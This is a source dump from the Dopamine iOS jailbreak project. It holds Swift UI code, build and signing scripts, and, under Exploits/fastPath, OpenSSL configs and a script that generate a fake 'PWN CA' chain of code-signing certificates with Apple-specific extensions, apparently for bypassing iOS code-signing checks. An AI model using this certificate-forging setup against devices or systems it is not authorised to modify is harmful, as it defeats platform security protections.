Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Classes/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // 
Logger.swift 3 | // Fugu15 4 | // 5 | // Created by exerhythm on 29.03.2023. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct LogMessage: Equatable, Identifiable { // one log entry: a fresh UUID, the text, and the kind of entry 11 | var id = UUID() 12 | var text: String 13 | var type: LogType 14 | 15 | enum LogType: RawRepresentable { 16 | case instant 17 | case continuous 18 | case success 19 | case error 20 | 21 | var rawValue: String { // prefix that Logger.log writes in front of the text 22 | switch self { 23 | case .instant, .continuous: // both kinds share one prefix 24 | return "[*]" 25 | case .success: 26 | return "[+]" 27 | case .error: 28 | return "E:" 29 | } 30 | } 31 | 32 | init?(rawValue: String) { // not a full inverse of rawValue: "[*]" always yields .instant, never .continuous 33 | switch rawValue { 34 | case "[*]": 35 | self = .instant 36 | case "[+]": 37 | self = .success 38 | case "E:": 39 | self = .error 40 | default: 41 | return nil 42 | } 43 | } 44 | } 45 | } 46 | 47 | class Logger: ObservableObject { 48 | @Published var userFriendlyLogs: [LogMessage] = [] 49 | @Published var log: String = "" 50 | 51 | static var shared = Logger() 52 | 53 | /** 54 | * Append a message to the full log and, when requested, to the user-friendly log list. The text is also printed to standard output and kept in the in-memory log string. 55 | * 56 | * - Parameter obj: Value to log; it is converted with String(describing:) 57 | * - Parameter type: Kind of entry (instant, continuous, success or error); its rawValue is the prefix written before the text 58 | * - Parameter isStatus: When true, the message is also appended to userFriendlyLogs, with the text used as an NSLocalizedString key 59 | */ 60 | static func log(_ obj: Any, type: LogMessage.LogType = .continuous, isStatus: Bool = false) { 61 | let text = String(describing: obj) 62 | print(text) 63 | shared.log += "\n\(type.rawValue) \(text)" 64 | if isStatus { 65 | shared.userFriendlyLogs.append(.init(text: NSLocalizedString(text, comment: "Jailbreak Status"), type: type)) 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Extensions/Error++.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Error++.swift 3 | // Fugu15 4 | // 5 | // Created by sourcelocation on 17/04/2023.
6 | // 7 | 8 | import Foundation 9 | 10 | extension String: LocalizedError { // conforms String to LocalizedError (and so to Error); the description is the string itself 11 | public var errorDescription: String? { return self } 12 | } 13 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/MaterialView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // MaterialView.swift 3 | // DebToIPA 4 | // 5 | // Created by exerhythm on 18.10.2022. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct MaterialView: UIViewRepresentable { // SwiftUI wrapper around a UIVisualEffectView showing a UIBlurEffect of the given style 11 | let material: UIBlurEffect.Style 12 | 13 | init(_ material: UIBlurEffect.Style) { 14 | self.material = material 15 | } 16 | 17 | func makeUIView(context: Context) -> UIVisualEffectView { // builds the effect view with a blur of style `material` 18 | UIVisualEffectView(effect: UIBlurEffect(style: material)) 19 | } 20 | 21 | func updateUIView(_ uiView: UIVisualEffectView, context: Context) { // re-creates the effect from `material` whenever SwiftUI calls this 22 | uiView.effect = UIBlurEffect(style: material) 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/PopupView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AlertView.swift 3 | // Dopamine 4 | // 5 | // Created by sourcelocation on 30/04/2023.
6 | // 7 | 8 | import SwiftUI 9 | 10 | struct PopupView: View { 11 | 12 | @ViewBuilder var title: Title 13 | @ViewBuilder var contents: Content 14 | 15 | @Binding var isPresented: Bool 16 | 17 | var body: some View { 18 | VStack { 19 | ZStack { 20 | if isPresented { 21 | Color.black 22 | .ignoresSafeArea() 23 | .opacity(0.6) 24 | .onTapGesture { 25 | isPresented = false 26 | } 27 | .zIndex(2) 28 | VStack { 29 | title 30 | 31 | Divider() 32 | .background(.white) 33 | .padding(.horizontal, 32) 34 | .opacity(0.25) 35 | .frame(maxWidth: 320) 36 | 37 | contents 38 | } 39 | .padding(.vertical) 40 | .transition(.opacity.combined(with: .scale(scale: 0.9))) 41 | .background(MaterialView(.systemUltraThinMaterialDark) 42 | .cornerRadius(16)) 43 | .zIndex(3) 44 | } 45 | 46 | } 47 | .foregroundColor(.white) 48 | .animation(.spring().speed(1.5), value: isPresented) 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/ellekit_1.0_iphoneos-arm64.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/ellekit_1.0_iphoneos-arm64.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/libjbdrw.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/libjbdrw.deb 
-------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/preferenceloader_2.2.6-1_iphoneos-arm64.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/preferenceloader_2.2.6-1_iphoneos-arm64.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/sileo.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/sileo.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/xinamine_1.0.6_iphoneos-arm64.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/xinamine_1.0.6_iphoneos-arm64.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/zebra.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/bootstrap/zebra.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/constants.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface Constants : NSObject 4 | + (NSString*)commitShortHash; 5 | + (NSString*)compileTime; 6 | + (NSString*)bundleID; 7 | @end 8 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/constants.m: -------------------------------------------------------------------------------- 1 | 
#import 2 | #import "constants.h" 3 | 4 | #define STRINGIZE(x) #x 5 | #define STRINGIZE2(x) STRINGIZE(x) 6 | 7 | #define _GIT_COMMIT_HASH GIT_COMMIT_HASH 8 | #define __GIT_COMMIT_HASH @STRINGIZE2(_GIT_COMMIT_HASH) 9 | 10 | #define _COMPILE_TIME COMPILE_TIME 11 | #define __COMPILE_TIME @STRINGIZE2(_COMPILE_TIME) 12 | 13 | #define _BUNDLE_ID BUNDLE_ID 14 | #define __BUNDLE_ID @STRINGIZE2(_BUNDLE_ID) 15 | 16 | @implementation Constants : NSObject 17 | + (NSString*)commitShortHash { 18 | return __GIT_COMMIT_HASH; 19 | } 20 | 21 | + (NSString*)compileTime { 22 | return __COMPILE_TIME; 23 | } 24 | 25 | + (NSString*)bundleID { 26 | return __BUNDLE_ID; 27 | } 28 | @end 29 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/include/_LSApplicationState.h: -------------------------------------------------------------------------------- 1 | /* 2 | * This header is generated by classdump-dyld 1.0 3 | * on Friday, January 21, 2022 at 6:51:04 AM Pacific Standard Time 4 | * Operating System: Version 15.2.1 (Build 19C63) 5 | * Image Source: /System/Library/Frameworks/CoreServices.framework/CoreServices 6 | * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. 
7 | */ 8 | 9 | #import 10 | //#import 11 | //#import 12 | //#import 13 | 14 | @class NSString; 15 | 16 | @interface _LSApplicationState : NSObject { 17 | 18 | NSString* _bundleIdentifier; 19 | unsigned long long _stateFlags; 20 | int _ratingRank; 21 | unsigned long long _installType; 22 | 23 | } 24 | 25 | @property (nonatomic,readonly) unsigned long long installType; 26 | @property (nonatomic,copy,readonly) NSString * bundleIdentifier; //@synthesize bundleIdentifier=_bundleIdentifier - In the implementation block 27 | @property (getter=isInstalled,nonatomic,readonly) BOOL installed; 28 | @property (getter=isPlaceholder,nonatomic,readonly) BOOL placeholder; 29 | @property (getter=isValid,nonatomic,readonly) BOOL valid; 30 | @property (getter=isRestricted,nonatomic,readonly) BOOL restricted; 31 | @property (getter=isRemovedSystemApp,nonatomic,readonly) BOOL removedSystemApp; 32 | @property (getter=isBlocked,nonatomic,readonly) BOOL blocked; 33 | @property (getter=isAlwaysAvailable,nonatomic,readonly) BOOL alwaysAvailable; 34 | @property (getter=isDowngraded,nonatomic,readonly) BOOL downgraded; 35 | +(BOOL)supportsSecureCoding; 36 | -(BOOL)isInstalled; 37 | -(void)addStateFlag:(unsigned long long)arg1 ; 38 | -(void)encodeWithCoder:(id)arg1 ; 39 | -(BOOL)isRemovedSystemApp; 40 | -(unsigned long long)installType; 41 | -(BOOL)isPlaceholder; 42 | -(BOOL)isRestricted; 43 | -(BOOL)isBlocked; 44 | -(id)description; 45 | -(id)initWithBundleIdentifier:(id)arg1 stateFlags:(unsigned long long)arg2 ratingRank:(int)arg3 installType:(unsigned long long)arg4 ; 46 | -(id)initWithCoder:(id)arg1 ; 47 | -(id)copyWithZone:(NSZone*)arg1 ; 48 | -(NSString *)bundleIdentifier; 49 | -(BOOL)isDowngraded; 50 | -(BOOL)isAlwaysAvailable; 51 | -(BOOL)isValid; 52 | @end 53 | 54 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | 
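// Fugu15 4 | // 5 | // Created by Linus Henze on 2022-07-29. 6 | // 7 | 8 | import Foundation 9 | import Fugu15KernelExploit 10 | 11 | if CommandLine.arguments.count > 1 { 12 | switch CommandLine.arguments[1] { 13 | case "removeFuguInstallPlist": // helper mode: delete FuguInstall.plist from the app bundle (errors ignored), then exit 14 | let path = Bundle.main.bundleURL 15 | 16 | let plist = path.appendingPathComponent("FuguInstall.plist") 17 | try? FileManager.default.removeItem(at: plist) 18 | 19 | exit(0) 20 | 21 | default: 22 | break 23 | } 24 | } 25 | 26 | Fugu15.mainHook() 27 | 28 | if isJailbroken() { 29 | // Extend PATH: system directories first, then the same directories under the rootifyPath("") prefix. 30 | if let rootPrefix = rootifyPath(path: "") { 31 | setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:\(rootPrefix)/sbin:\(rootPrefix)/bin:\(rootPrefix)/usr/sbin:\(rootPrefix)/usr/bin", 1) 32 | } 33 | 34 | let dpDefaults = dopamineDefaults() 35 | if let safeModePath = rootifyPath(path: "basebin/.safe_mode") { // nil path: leave the stored setting untouched instead of crashing on a force-unwrap 36 | dpDefaults.set(!FileManager.default.fileExists(atPath: safeModePath), forKey: "tweakInjectionEnabled") // enabled only while the .safe_mode marker file is absent 37 | } 38 | } 39 | 40 | Fugu15App.main() 41 | -------------------------------------------------------------------------------- /Dopamine/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: all clean build_clean 2 | 3 | all: Dopamine.tipa 4 | 5 | Dopamine.tipa: build/Build/Products/Debug-iphoneos/Dopamine.app 6 | @echo Ad-Hoc signing Dopamine 7 | xattr -rc build/Build/Products/Debug-iphoneos/Dopamine.app 8 | ldid -SDopamine/Dopamine.entitlements build/Build/Products/Debug-iphoneos/Dopamine.app/Dopamine 9 | ldid -s build/Build/Products/Debug-iphoneos/Dopamine.app 10 | rm -rf Payload Dopamine.tipa 11 | mkdir Payload 12 | cp -r build/Build/Products/Debug-iphoneos/Dopamine.app Payload/Dopamine.app 13 | zip -Ar Dopamine.tipa Payload 14 | rm -rf Payload 15 | 16 | build/Build/Products/Debug-iphoneos/Dopamine.app: FORCE 17 | xcodebuild -scheme Dopamine \ 18 | -derivedDataPath build \ 19 | -destination 'generic/platform=iOS' \ 20 |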
CODE_SIGN_IDENTITY="" \ 21 | CODE_SIGNING_REQUIRED=NO \ 22 | GCC_PREPROCESSOR_DEFINITIONS="GIT_COMMIT_HASH=`git describe --tags --abbrev=0`_`git rev-parse --short HEAD` \ 23 | COMPILE_TIME=`TZ=UTC-8 date \"+%Y%m%d_%H%M%S\"` \ 24 | BUNDLE_ID=page.liam.Dopamine" 25 | 26 | clean: 27 | rm -rf build Payload Dopamine.tipa 28 | 29 | build_clean: 30 | rm -rf Payload build 31 | 32 | FORCE: ; 33 | -------------------------------------------------------------------------------- /Dopamine/localization_keys.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | plutil -convert json "$1".lproj/Localizable.strings -o - | ruby -r json -e 'puts JSON.parse(STDIN.read).keys.sort' 3 | -------------------------------------------------------------------------------- /Dopamine/sort_localizations.sh: -------------------------------------------------------------------------------- 1 | localisort -t ./en.lproj/Localizable.strings -i ./ar.lproj/Localizable.strings -ct -r 2 | localisort -t ./en.lproj/Localizable.strings -i ./da.lproj/Localizable.strings -ct -r 3 | localisort -t ./en.lproj/Localizable.strings -i ./de.lproj/Localizable.strings -ct -r 4 | localisort -t ./en.lproj/Localizable.strings -i ./el.lproj/Localizable.strings -ct -r 5 | localisort -t ./en.lproj/Localizable.strings -i ./fil.lproj/Localizable.strings -ct -r 6 | localisort -t ./en.lproj/Localizable.strings -i ./fr.lproj/Localizable.strings -ct -r 7 | localisort -t ./en.lproj/Localizable.strings -i ./ja.lproj/Localizable.strings -ct -r 8 | localisort -t ./en.lproj/Localizable.strings -i ./kk.lproj/Localizable.strings -ct -r 9 | localisort -t ./en.lproj/Localizable.strings -i ./ko.lproj/Localizable.strings -ct -r 10 | localisort -t ./en.lproj/Localizable.strings -i ./nl.lproj/Localizable.strings -ct -r 11 | localisort -t ./en.lproj/Localizable.strings -i ./pl.lproj/Localizable.strings -ct -r 12 | localisort -t ./en.lproj/Localizable.strings -i ./pt-BR.lproj/Localizable.strings 
-ct -r 13 | localisort -t ./en.lproj/Localizable.strings -i ./ru.lproj/Localizable.strings -ct -r 14 | localisort -t ./en.lproj/Localizable.strings -i ./sv.lproj/Localizable.strings -ct -r 15 | localisort -t ./en.lproj/Localizable.strings -i ./tr.lproj/Localizable.strings -ct -r 16 | localisort -t ./en.lproj/Localizable.strings -i ./uk.lproj/Localizable.strings -ct -r 17 | localisort -t ./en.lproj/Localizable.strings -i ./ur.lproj/Localizable.strings -ct -r 18 | localisort -t ./en.lproj/Localizable.strings -i ./vi.lproj/Localizable.strings -ct -r 19 | localisort -t ./en.lproj/Localizable.strings -i ./zh_CN.lproj/Localizable.strings -ct -r 20 | localisort -t ./en.lproj/Localizable.strings -i ./zh_HK.lproj/Localizable.strings -ct -r 21 | localisort -t ./en.lproj/Localizable.strings -i ./zh_TW.lproj/Localizable.strings -ct -r 22 | localisort -t ./en.lproj/Localizable.strings -i ./zh-Hans.lproj/Localizable.strings -ct -r -------------------------------------------------------------------------------- /Exploits/fastPath/arm.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Exploits/fastPath/arm.pfx -------------------------------------------------------------------------------- /Exploits/fastPath/ca.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/ca.key 8 | certificate = $dir/ca.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 
18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN CA 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | 66 | [ v3_intermediate_ca ] 67 | # Extensions for a typical CA (`man x509v3_config`). 
68 | basicConstraints = critical, CA:true 69 | keyUsage = critical, digitalSignature, keyCertSign 70 | extendedKeyUsage = codeSigning 71 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 72 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 73 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 74 | -------------------------------------------------------------------------------- /Exploits/fastPath/clean.sh: -------------------------------------------------------------------------------- 1 | rm -f index.txt.* index.txt ca.key ca.crt cbd.crt itd.crt itd.key itd.csr.pem usr_arm.crt usr_arm.csr.pem usr_arm.key usr_x86_64.crt usr_x86_64.csr.pem usr_x86_64.key serial serial.* 2 | rm -rf ncerts 3 | -------------------------------------------------------------------------------- /Exploits/fastPath/genCrt.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | openssl genrsa -out ca.key 2048 4 | openssl genrsa -out itd.key 2048 5 | openssl genrsa -out usr_x86_64.key 2048 6 | openssl genrsa -out usr_arm.key 2048 7 | 8 | openssl req -new -x509 -key ca.key -out ca.crt -config ca.conf -days 3650 -batch 9 | openssl req -config itd.conf -new -sha256 -key itd.key -out itd.csr.pem -batch 10 | openssl req -config usr_x86_64.conf -new -sha256 -key usr_x86_64.key -out usr_x86_64.csr.pem -batch 11 | openssl req -config usr_arm.conf -new -sha256 -key usr_arm.key -out usr_arm.csr.pem -batch 12 | 13 | echo 1000 > serial 14 | mkdir -p ncerts 15 | rm -f index.txt.* index.txt && touch index.txt 16 | 17 | openssl ca -config ca.conf -extensions v3_intermediate_ca -days 3650 -notext -in itd.csr.pem -out itd.crt -md sha256 -batch 18 | 19 | rm -f index.txt.* index.txt && touch index.txt 20 | 21 | openssl ca -config itd.conf -extensions x86_64_cert -days 3650 -notext -in usr_x86_64.csr.pem -out usr_x86_64.crt -md sha256 -batch 22 | 23 | rm -f index.txt.* index.txt && touch index.txt 24 | 25 | openssl ca -config itd.conf -extensions arm_cert -days 3650 
-notext -in usr_arm.csr.pem -out usr_arm.crt -md sha256 -batch 26 | 27 | cat ca.crt itd.crt > cbd.crt 28 | 29 | openssl pkcs12 -export -out x86_64.pfx -inkey usr_x86_64.key -in usr_x86_64.crt -certfile cbd.crt -password pass:password 30 | openssl pkcs12 -export -out arm.pfx -inkey usr_arm.key -in usr_arm.crt -certfile cbd.crt -password pass:password 31 | -------------------------------------------------------------------------------- /Exploits/fastPath/itd.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 
49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Intermediate CA 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | 66 | [ x86_64_cert ] 67 | # Extensions for a typical CA (`man x509v3_config`). 68 | basicConstraints = critical, CA:true 69 | keyUsage = critical, digitalSignature, keyCertSign 70 | extendedKeyUsage = codeSigning 71 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 72 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 73 | 74 | [ arm_cert ] 75 | # Extensions for a typical CA (`man x509v3_config`). 76 | basicConstraints = critical, CA:true 77 | keyUsage = critical, digitalSignature, keyCertSign 78 | extendedKeyUsage = codeSigning 79 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 80 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 81 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_arm.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 
18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_x86_64.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 
7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 
59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/x86_64.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Exploits/fastPath/x86_64.pfx -------------------------------------------------------------------------------- /Exploits/oobPCI/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /oobPCI 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Makefile: -------------------------------------------------------------------------------- 1 | SDK=macosx 2 | TARGET=arm64-apple-macos12.0 3 | 4 | CC=xcrun -sdk $(SDK) clang 5 | 6 | WARNINGS=-Wall -Wpedantic -Werror 7 | NO_WARNINGS=-Wno-gnu-statement-expression -Wno-gnu-zero-variadic-macro-arguments -Wno-gnu-empty-struct -Wno-dollar-in-identifier-extension -Wno-language-extension-token -Wno-zero-length-array 8 | CFLAGS=-target $(TARGET) -D__arm64__ -D__aarch64__ -D__DARWIN_OPAQUE_ARM_THREAD_STATE64 -nostdlib -O0 $(WARNINGS) $(NO_WARNINGS) 9 | LDFLAGS=-target $(TARGET) -nostdlib -dead-strip -fpie -lSystem 10 | 11 | MIG_SOURCES=$(wildcard Sources/*.defs) 12 | MIG_GENERATED_SOURCES=$(addprefix Sources/generated/,$(patsubst %.defs,%.c,$(notdir $(MIG_SOURCES)))) 13 | MIG_GENERATED_HEADERS=$(addprefix Sources/generated/,$(patsubst %.defs,%.h,$(notdir $(MIG_SOURCES)))) 14 | 15 | SOURCES=$(wildcard Sources/*.c) $(wildcard Sources/*.S) $(MIG_GENERATED_SOURCES) 16 | OBJS=$(addprefix build/,$(patsubst %.c,%.o,$(patsubst %.S,%.o,$(SOURCES)))) 17 | 18 | 
